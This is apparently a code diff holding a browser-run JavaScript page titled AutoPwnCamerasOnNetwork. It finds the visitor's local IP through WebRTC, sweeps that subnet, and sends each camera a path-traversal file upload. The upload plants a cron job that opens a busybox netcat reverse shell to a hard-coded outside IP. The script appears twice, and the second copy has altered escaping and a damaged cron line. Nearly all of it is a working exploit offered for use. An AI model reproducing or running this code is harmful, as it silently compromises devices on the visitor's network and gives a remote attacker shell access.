SmugZombie · August 3, 2017 19:08
diff --git a/AutoPwnCamerasOnNetwork.js b/AutoPwnCamerasOnNetwork.js
 <script
  src="https://code.jquery.com/jquery-2.2.4.min.js"
  integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44="
  crossorigin="anonymous"></script>
 <!-- To Auto PWN, comment out the button and uncomment out "beginPwn()" at the bottom of the script -->
 <button onclick='beginPwn()'>
  PWN
 </button>
 </button>
 <div id='pwnlog'>

 </div>

 <script>

 //get the IP addresses associated with the user
 function getIPs(callback) {
   var ip_dups = {};
   //compatibility for firefox and chrome
   var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
   var useWebKit = !!window.webkitRTCPeerConnection;
   //bypass naive webrtc blocking using an iframe
   if (!RTCPeerConnection) {
     //NOTE: you need to have an iframe in the page right above the script tag
     //
     //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
     //<script>...getIPs called in here...
     //
     var win = iframe.contentWindow;
     RTCPeerConnection = win.RTCPeerConnection || win.mozRTCPeerConnection || win.webkitRTCPeerConnection;
     useWebKit = !!win.webkitRTCPeerConnection;
   }

   //minimal requirements for data connection
   var mediaConstraints = {
     optional: [{
       RtpDataChannels: true
     }]
   };

   var servers = {
     iceServers: [{
       urls: "stun:stun.services.mozilla.com"
     }]
   };



   function handleCandidate(candidate) {
     //match just the IP address
     var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
     var ip_addr = ip_regex.exec(candidate)[1];

     //remove duplicates
     if (ip_dups[ip_addr] === undefined)
       callback(ip_addr);

     ip_dups[ip_addr] = true;
   }

   //construct a new RTCPeerConnection
     var pc = new RTCPeerConnection(servers, mediaConstraints);
     //listen for candidate events
     pc.onicecandidate = function(ice) {
       //skip non-candidate events
       if (ice.candidate)
         handleCandidate(ice.candidate.candidate);
     };
     //create a bogus data channel
     pc.createDataChannel("");

     //create an offer sdp
     pc.createOffer(function(result) {

       //trigger the stun server request
       pc.setLocalDescription(result, function() {}, function() {});

     }, function() {});

     //wait for a while to let everything done
     setTimeout(function() {
       //read candidate info from local description
       var lines = pc.localDescription.sdp.split('\n');

       lines.forEach(function(line) {
         if (line.indexOf('a=candidate:') === 0)
           handleCandidate(line);
       });
     }, 1000);
   }

 //insert IP addresses into the page
 function beginPwn() {
 getIPs(function(ip) {
   //local IPs
   if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
     window.localIP = ip;
     scanIPs(window.localIP);
   }
 });
 }

 function scanIPs(ip) {
   console.log(ip)
   ipRange = ip.replace(ip.substring(ip.lastIndexOf(".") + 1), "");
   console.log(ipRange)
   for (i = 1; i <= 255; i++) {
     ip = ipRange + i
     console.log(ip);
     pwnDevice(ip);
   }
 }

 function pwnDevice(ip) {
   //$("#log").append("Pwning: " + ip)
   $("#pwnlog").html($("#pwnlog").html() + "<br>Pwning: " + ip);
   reverseShell(ip, "34.209.114.44");
 }

 function reverseShell(target, attacker) {
   var file = new Blob(["*/1 * * * * /bin/busybox nc " + attacker + " 1337 -e /bin/sh"], {
     type: "application/octet-stream"
   });
   var uploadForm = new FormData();
   var veryLongPath = "../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/etc/cron/root";
   uploadForm.append("uploadfile", file, veryLongPath);
   var xhr = new XMLHttpRequest();
   xhr.open('POST', "http://" + target + ":8080/cgi-bin/haserlupgrade.cgi", true);
   console.log("Sending reverse shell payload to " + target + ", listen on " + attacker + ":1337 for response.");
   xhr.send(uploadForm);
 }


 // beginPwn()
 </script>
	<script
	src="https://code.jquery.com/jquery-2.2.4.min.js"
	integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44="
	crossorigin="anonymous"></script>
	<!-- To Auto PWN, comment out the button and uncomment out "beginPwn()" at the bottom of the script -->
	<button onclick='beginPwn()'>
	PWN
	</button>
	</button>
	<div id='pwnlog'>

	</div>

	<script>

	//get the IP addresses associated with the user
	function getIPs(callback) {
	var ip_dups = {};
	//compatibility for firefox and chrome
	var RTCPeerConnection = window.RTCPeerConnection \|\| window.mozRTCPeerConnection \|\| window.webkitRTCPeerConnection;
	var useWebKit = !!window.webkitRTCPeerConnection;
	//bypass naive webrtc blocking using an iframe
	if (!RTCPeerConnection) {
	//NOTE: you need to have an iframe in the page right above the script tag
	//
	//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
	//<script>...getIPs called in here...
	//
	var win = iframe.contentWindow;
	RTCPeerConnection = win.RTCPeerConnection \|\| win.mozRTCPeerConnection \|\| win.webkitRTCPeerConnection;
	useWebKit = !!win.webkitRTCPeerConnection;
	}

	//minimal requirements for data connection
	var mediaConstraints = {
	optional: [{
	RtpDataChannels: true
	}]
	};

	var servers = {
	iceServers: [{
	urls: "stun:stun.services.mozilla.com"
	}]
	};



	function handleCandidate(candidate) {
	//match just the IP address
	var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}\|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
	var ip_addr = ip_regex.exec(candidate)[1];

	//remove duplicates
	if (ip_dups[ip_addr] === undefined)
	callback(ip_addr);

	ip_dups[ip_addr] = true;
	}

	//construct a new RTCPeerConnection
	var pc = new RTCPeerConnection(servers, mediaConstraints);
	//listen for candidate events
	pc.onicecandidate = function(ice) {
	//skip non-candidate events
	if (ice.candidate)
	handleCandidate(ice.candidate.candidate);
	};
	//create a bogus data channel
	pc.createDataChannel("");

	//create an offer sdp
	pc.createOffer(function(result) {

	//trigger the stun server request
	pc.setLocalDescription(result, function() {}, function() {});

	}, function() {});

	//wait for a while to let everything done
	setTimeout(function() {
	//read candidate info from local description
	var lines = pc.localDescription.sdp.split('\n');

	lines.forEach(function(line) {
	if (line.indexOf('a=candidate:') === 0)
	handleCandidate(line);
	});
	}, 1000);
	}

	//insert IP addresses into the page
	function beginPwn() {
	getIPs(function(ip) {
	//local IPs
	if (ip.match(/^(192\.168\.\|169\.254\.\|10\.\|172\.(1[6-9]\|2\d\|3[01]))/)) {
	window.localIP = ip;
	scanIPs(window.localIP);
	}
	});
	}

	function scanIPs(ip) {
	console.log(ip)
	ipRange = ip.replace(ip.substring(ip.lastIndexOf(".") + 1), "");
	console.log(ipRange)
	for (i = 1; i <= 255; i++) {
	ip = ipRange + i
	console.log(ip);
	pwnDevice(ip);
	}
	}

	function pwnDevice(ip) {
	//$("#log").append("Pwning: " + ip)
	$("#pwnlog").html($("#pwnlog").html() + "<br>Pwning: " + ip);
	reverseShell(ip, "34.209.114.44");
	}

	function reverseShell(target, attacker) {
	var file = new Blob(["/1 * * * /bin/busybox nc " + attacker + " 1337 -e /bin/sh"], {
	type: "application/octet-stream"
	});
	var uploadForm = new FormData();
	var veryLongPath = "../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/mlswwwn/../../../mnt/skyeye/etc/cron/root";
	uploadForm.append("uploadfile", file, veryLongPath);
	var xhr = new XMLHttpRequest();
	xhr.open('POST', "http://" + target + ":8080/cgi-bin/haserlupgrade.cgi", true);
	console.log("Sending reverse shell payload to " + target + ", listen on " + attacker + ":1337 for response.");
	xhr.send(uploadForm);
	}


	// beginPwn()
	</script>